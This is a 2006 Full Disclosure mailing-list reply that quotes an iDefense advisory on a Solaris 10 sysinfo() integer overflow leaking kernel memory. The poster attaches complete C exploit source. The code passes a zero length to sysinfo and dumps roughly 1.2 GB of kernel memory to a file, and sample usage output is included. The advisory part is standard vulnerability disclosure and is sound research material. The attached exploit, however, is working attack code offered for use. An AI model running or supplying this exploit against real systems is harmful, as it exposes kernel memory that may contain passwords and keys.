Full Disclosure mailing list archives
Re: Re: iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
From: Micheal Turner <wh1t3h4t3 () yahoo co uk>
Date: Mon, 24 Jul 2006 11:10:17 +0100 (BST)
Exploit has been attached as problems with site hosting over weekend. --- Micheal Turner <wh1t3h4t3 () yahoo co uk> wrote:
http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SUN-sysinfo.c
--- labs-no-reply <labs-no-reply () idefense com> wrote:Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability iDefense Security Advisory 07.20.06
http://www.idefense.com/application/poi/display?type=vulnerabilities
July 20, 2006 I. BACKGROUND Solaris is a UNIX operating system developed bySunMicrosystems. II. DESCRIPTION Local exploitation of an integer overflow vulnerability in Sun Microsystems Inc. Solaris allows attackers to read kernel memory from a non-privileged userspace process. The vulnerability specifically exists due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c. The vulnerable code is as follows: 125 if (kstr != NULL) { 126 if ((strcnt = strlen(kstr)) >= count){127 getcnt = count - 1; 128 if (subyte(buf + count - 1, 0) <0)129 return (set_errno(EFAULT)); 130 } else 131 getcnt = strcnt + 1; 132 if (copyout(kstr, buf, getcnt)) 133 return (set_errno(EFAULT)); 134 return (strcnt + 1); 135 } If the variable count (which is a value providedbythe user invoking the function) is 0, the function will call the copyout function with a length argument of -1. Because copyout interprets the length argument as an unsigned integer, a large amount of data willbecopied out to userspace, well beyond the boundaries that are intended. III. ANALYSIS Successful exploitation of this vulnerabilityallowsattackers to read sensitive kernel memory. This can lead to the compromise of passwords or keys. It can also aid an attacker in gathering information for exploitation of other kernel levelvulnerabilities.IV. DETECTION iDefense has confirmed that Solaris 10 is vulnerable. Earlier versions of Solaris are not affected. V. WORKAROUND iDefense is currently unaware of any workaroundforthis issue. VI. VENDOR RESPONSE Sun Alert ID 102343 addresses this issue and is available at:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102343-1
VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 12/15/2005 Initial vendor notification 12/15/2005 Initial vendor response 07/20/2006 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution ofthisalert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish toreprintthe whole or any part of this alert in any other medium other than electronically, please email customerservice () idefense com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for useinan AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from useof,or reliance on, this information. _______________________________________________ Full-Disclosure - We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___________________________________________________________
The all-new Yahoo! Mail goes wherever you go - free your email address from your Internet provider. http://uk.docs.yahoo.com/nowyoucan.html _______________________________________________ Full-Disclosure - We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___________________________________________________________ The all-new Yahoo! Mail goes wherever you go - free your email address from your Internet provider. http://uk.docs.yahoo.com/nowyoucan.html
/* Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure exploit * =================================================================== * Local exploitation of an integer overflow vulnerability in Sun * Microsystems Inc. Solaris allows attackers to read kernel memory from a * non-privileged userspace process. The vulnerability specifically exists * due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c * * Example Use. * $ uname -a * SunOS sunos 5.11 snv_30 sun4u sparc SUNW,Ultra-250 * $ ./prdelka-vs-SUN-sysinfo kbuf * [ Solaris <= 10 sysinfo() kernel memory information leak * [ Wrote 1294967293 bytes to kbuf * $ ls -al kbuf * -rwx------ 1 user other 1.2G Jul 21 23:56 kbuf * * -prdelka */ #include <sys/systeminfo.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #define bufsize 1294967293 int main(int argc,char* argv[]){ int fd; ssize_t out; char* output_buffer; if(argc < 2){ printf("[ Use with <filepath>\n"); exit(1); } printf("[ Solaris <= 10 sysinfo() kernel memory information leak\n"); output_buffer = malloc(bufsize); memset(output_buffer,0,bufsize); sysinfo(SI_SYSNAME,output_buffer,0); fd = open(argv[1],O_RDWR|O_CREAT,0700); if(fd){ out = write(fd,output_buffer,bufsize); printf("[ Wrote %u bytes to %s\n",out,argv[1]); close(fd); } exit(0); }
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability labs-no-reply (Jul 21)
- Re: iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability Micheal Turner (Jul 21)
- Re: Re: iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability Micheal Turner (Jul 24)
- Re: iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability Micheal Turner (Jul 21)